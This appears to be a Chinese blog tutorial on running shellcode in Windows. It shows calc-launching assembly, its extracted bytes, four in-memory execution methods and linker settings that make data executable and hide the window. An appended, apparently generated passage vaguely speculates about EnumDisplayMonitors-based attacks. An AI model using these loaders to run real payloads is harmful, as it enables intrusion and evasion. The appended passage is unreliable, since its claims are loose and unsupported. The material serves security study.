执行shellcode的几种方式

首先写出汇编成功弹出计算器

#pragma comment(linker,"/section:.data,RWE")	//data段可读写

#pragma comment(linker,"/subsystem:\"windows\" /entry:\"mainCRTStartup\"")	//不显示窗口

#pragma comment(linker,"/INCREMENTAL:NO")	//指定非增量编译
#include "windows.h"
void main()
{
	__asm{
	  sub esp,0x454
	  xor ebx,ebx
	  push ebx
	  mov eax,0x6578652e
	  push eax
	  mov eax,0x636c6163
	  push eax
	  mov eax,esp
	  push 5
	  push eax
	  mov eax,0x74f0dab0
	  call eax
	  mov esp,0x450
	  
   }
 }

下面这两条语句时和call dword ptr [WinExec]功能相同,可以利用这条语句找出自己机子上WinExec地址,然后将0x74f0dab0替换成自己机子上的地址

 mov eax,0x74f0dab0
 call eax

提取汇编的机器码

unsigned char shellcode[]="\x81\xEC\x54\x04\x00\x00\x33\xDB\x53\xB8\x2E\x65\x78\x65\x50"
"\xB8\x63\x61\x6C\x63\x50\x8B\xC4\x6A\x05\x50"
"\xB8\xB0\xDA\xF0\x74\xFF\xD0"
"\xBC\x50\x04\x00\x00";

接下来就是如何执行shellcode了

0x01

将shellcode硬改成函数名,然后shellcode的内容相当于函数体

void Run1()
{
	((void(*)(void))&shellcode)();
}
0x02

取shellcode的偏移地址,然后到shellcode处执行

//第2种方法
void Run2()
{
	__asm{
		lea eax,shellcode
		jmp eax
	}
}
0x03

和0x02方法相同,写法不一样

//第3种方法

void Run3()
{

	__asm{
		mov eax,offset shellcode
		jmp eax
	}
}
0x04

用emit在当前位置直接插入数据(实际上是指令),硬编码执行

//第四种方法
void Run4()
{

	__asm{
		mov eax,offset shellcode
		_emit 0xff;	
		_emit 0xe0;
	}

}
调试
#pragma comment(linker,"/section:.data,RWE")	//data段可读写

#pragma comment(linker,"/subsystem:\"windows\" /entry:\"mainCRTStartup\"")	//不显示窗口

#pragma comment(linker,"/INCREMENTAL:NO")	//指定非增量编译
#include "windows.h"
unsigned char shellcode[]="\x81\xEC\x54\x04\x00\x00\x33\xDB\x53\xB8\x2E\x65\x78\x65\x50"
"\xB8\x63\x61\x6C\x63\x50\x8B\xC4\x6A\x05\x50"
"\xB8\xB0\xDA\xF0\x74\xFF\xD0"
"\xBC\x50\x04\x00\x00";


//第一种方法
void Run1()
{
	((void(*)(void))&shellcode)();
}

//第2种方法
void Run2()
{
	__asm{
		lea eax,shellcode
		jmp eax
	}
}

//第3种方法

void Run3()
{

	__asm{
		mov eax,offset shellcode
		jmp eax
	}
}

//第四种方法
void Run4()
{

	__asm{
		mov eax,offset shellcode
		_emit 0xff;	//用emigt就是在当前位置直接插入数据(实际上是指令),硬编码执行
		_emit 0xe0;
	}

}

void main()
{

/*	
	__asm{
	  sub esp,0x454
	  xor ebx,ebx
	  push ebx
	  mov eax,0x6578652e
	  push eax
	  mov eax,0x636c6163
	  push eax
	  mov eax,esp
	  push 5
	  push eax
	  mov eax,0x74f0dab0
	  call eax
	  mov esp,0x450
	  
   }
   */
	
	Run1();
}

在这里插入图片描述
其他三种方法我都调试了都可以弹出计算器

  • 2
    点赞
  • 12
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
调用EnumDisplayMonitors函数可以用来枚举系统中的所有显示器。而Shellcode是一段被编码的机器指令,用于实现特定功能或进行恶意操作。将调用EnumDisplayMonitors和执行Shellcode结合在一起,可以实现一些特定的功能或攻击。 一种可能的应用场景是,在恶意软件中使用调用EnumDisplayMonitors执行Shellcode的方法,以实现屏幕监控或远程控制的功能。通过调用EnumDisplayMonitors函数可以获取系统中的所有显示器信息,包括分辨率、位置等,从而可以监听或截取显示器的画面。接下来,将编写好的Shellcode注入到恶意程序中,通过执行Shellcode来进行屏幕捕获、存储或远程传输,达到监控或控制的目的。 另一种可能的应用场景是,使用调用EnumDisplayMonitors执行Shellcode的方法进行系统攻击。通过枚举系统中的所有显示器,可以获取到显示器的相关信息,例如分辨率、颜色位数等,再结合Shellcode执行,可以针对特定显示器进行恶意操作,如篡改显示器的分辨率、改变颜色设置等,从而干扰用户的正常使用,或者进行其他恶意活动,如勒索、敲诈等。 需要注意的是,调用EnumDisplayMonitors执行Shellcode并进行相关操作属于恶意行为,会对用户的隐私和系统安全造成严重威胁。因此,用户和系统管理员应当保持警惕,定期升级和更新系统、杀毒软件,并避免下载和运行来历不明或不可信的程序,以确保系统的安全。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值